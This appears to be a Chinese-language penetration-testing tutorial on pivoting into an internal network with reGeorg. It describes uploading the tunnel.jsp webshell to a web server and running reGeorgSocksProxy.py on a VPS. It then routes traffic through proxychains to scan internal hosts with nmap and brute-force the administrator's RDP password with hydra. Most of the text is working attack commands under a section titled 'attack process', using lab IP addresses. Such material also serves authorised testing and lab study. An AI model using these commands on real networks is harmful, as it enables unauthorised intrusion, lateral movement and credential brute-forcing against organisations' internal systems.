regeorg搭建socket隧道

工具安装

• 下载地址

https://github.com/sensepost/reGeorg

环境配置

• 说明

reGeorg提供了PHP、ASPX、JSP脚本，直接访问显示“Georg says, ‘All seems fine’”，表示脚本运行正常。

# 攻击过程
vps:192.168.110.131
web服务器：192.168.110.1
内网主机：192.168.110.2
当vps上传脚本到web服务器，监听自身的端口，假设web服务器和内网主机可以互通，那vps可以访问到内网主机

• 安装工具

windows和linux需要安装setuptools,在下载的regeorg文件夹中运行以下命令：
pip install setuptools

window会生成以下文件夹

linux会生成相同的文件夹

• 将.jsp文件上传到web服务器后，看vps是否能够访问

curl .jsp文件的地址

• 能访问之后运行python，监听本地端口

python2 reGeorgSocksProxy.py -p 9999 -u http://192.168.110.1:8000/tunnel.tomcat.5.jsp

//出现Georg says, ‘All seems fine说明运行正常

• 隧道正常工作后，使用proxychains工具，访问内网资源

git clone https://github.com/rofl0r/proxychains-ng  //下载proxychains
vim /etc/proxychains.conf  //修改配置文件
socks5  192.168.110.131 9999   //在配置文件最后一行修改

• 使用proxychains

使用方法：

proxychains <运行的命令> <命令参数>

只要在需要代理的命令前面加上proxychains即可,例如：
proxychains firefox 可以使用firefox浏览器远程访问内网服务器
proxychains nmap -T4 -A 10.8.0.0/24 扫描内网开放端口

当需要访问内网web时，可使用：
proxychains curl 内网主机ip

当需要爆破内网主机的3389时
proxychains hydra -s 3389 -v -l administrator -P 1.txt -t 16 内网主机ip

参考

https://blog.csdn.net/weixin_30245867/article/details/98036505